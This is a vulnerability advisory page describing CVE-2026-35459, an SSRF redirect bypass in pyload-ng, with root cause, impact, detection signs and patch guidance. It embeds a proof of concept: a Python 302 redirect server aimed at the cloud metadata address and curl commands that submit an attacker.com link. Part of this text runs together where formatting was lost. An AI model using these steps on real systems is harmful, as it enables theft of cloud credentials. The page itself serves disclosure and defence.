
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-35459 is a Server-Side Request Forgery (SSRF) filter bypass vulnerability in pyload-ng that allows an authenticated user with ADD permission to access internal network resources by submitting a URL that redirects to an internal address. It is an incomplete fix for CVE-2026-33992 (GHSA-m74m-f7cr-432x), which was a Critical, unauthenticated SSRF. All versions of pyload-ng up to and including 0.5.0b3.dev96 are affected; the patched version is 0.5.0b3.dev97. The vulnerability was published on April 2, 2026, and added to the GitHub Advisory Database on April 4, 2026. It carries a CVSS v4.0 base score of 9.3 (Critical) (GitHub Advisory, pyload Security Advisory).
The root cause (CWE-918: SSRF) lies in an incomplete SSRF mitigation: the check in src/pyload/plugins/base/downloader.py (lines 335–341) validates only the hostname of the initial download URL submitted by the user. However, pycurl is configured with FOLLOWLOCATION=1 and MAXREDIRS=10 in src/pyload/core/network/http/http_request.py, causing it to automatically follow up to 10 HTTP redirects without any SSRF validation on redirect targets. An attacker hosts a redirect server that issues a 302 response pointing to an internal address (e.g., http://169.254.169.254/metadata/v1.json); the initial URL resolves to a public IP and passes the filter, but pycurl silently follows the redirect to the internal host. No CURLOPT_REDIR_PROTOCOLS restriction is set anywhere in HTTPRequest, leaving redirect targets entirely unvalidated (GitHub Advisory, pyload Security Advisory).
A successful exploit allows an authenticated user with ADD permission to reach cloud metadata endpoints (e.g., 169.254.169.254 on AWS, GCP, Azure, DigitalOcean) — potentially exposing IAM credentials and instance identity — as well as internal network services on RFC-1918 ranges (10.x, 172.16.x, 192.168.x) and localhost services (127.0.0.1). Retrieved content is saved to pyload's storage folder, making exfiltration straightforward. The confidentiality and integrity impact is rated High for both the vulnerable and subsequent systems, with no availability impact (GitHub Advisory, pyload Security Advisory).
A proof-of-concept exploit is publicly available in the GitHub security advisory, including a complete redirect server implementation in Python and a curl command to trigger the SSRF bypass (pyload Security Advisory). Exploitation requires authentication with ADD permission, which reduces the attack surface compared to the original unauthenticated CVE-2026-33992. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.038% (13th percentile), indicating a currently low probability of active exploitation (GitHub Advisory).
curl -c cookies.txt -X POST http://target:8000/login -d 'username=user&password=pass').from http.server import HTTPServer, BaseHTTPRequestHandler
class RedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header("Location", "http://169.254.169.254/metadata/v1.json")
self.end_headers()
HTTPServer(("0.0.0.0", 8888), RedirectHandler).serve_forever()curl -b cookies.txt -X POST 'http://target:8000/json/add_package' \
-d 'add_name=ssrf-test&add_dest=1&add_links=http://attacker.com:8888/redirect'attacker.com to a public IP, passes the SSRF check, and calls _download(). pycurl follows the 302 redirect to http://169.254.169.254/metadata/v1.json without any validation.169.254.169.254, RFC-1918 addresses (10.x, 172.16.x, 192.168.x), or 127.0.0.1 following an initial connection to an external host; unusual HTTP 302 redirect chains originating from the pyload process./json/add_package with add_links values pointing to external domains that subsequently redirect internally; pycurl transfer logs showing connections to cloud metadata IPs.169.254.169.254 on port 80 (pyload Security Advisory).Upgrade pyload-ng to version 0.5.0b3.dev97 or later, which addresses the bypass by implementing a PREREQFUNCTION pycurl callback (_pre_request_callback) that validates the resolved IP of every connection — including redirect targets — before the request is sent, and removes the hostname-only check from BaseDownloader.download() (Patch Commit). If immediate upgrade is not possible, restrict network egress from the pyload service to block access to RFC-1918 ranges, 127.0.0.1, and 169.254.169.254 at the firewall or network level. Additionally, limit ADD permission to fully trusted users only to reduce the attack surface (pyload Security Advisory).
The vulnerability was reported by researcher kodareef5 and published by GammaC0de in the pyload security advisory on April 2, 2026 (pyload Security Advisory). A Bluesky post referencing the CVE was noted shortly after public disclosure. No significant broader media coverage or notable researcher commentary beyond the advisory itself has been identified at this time.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."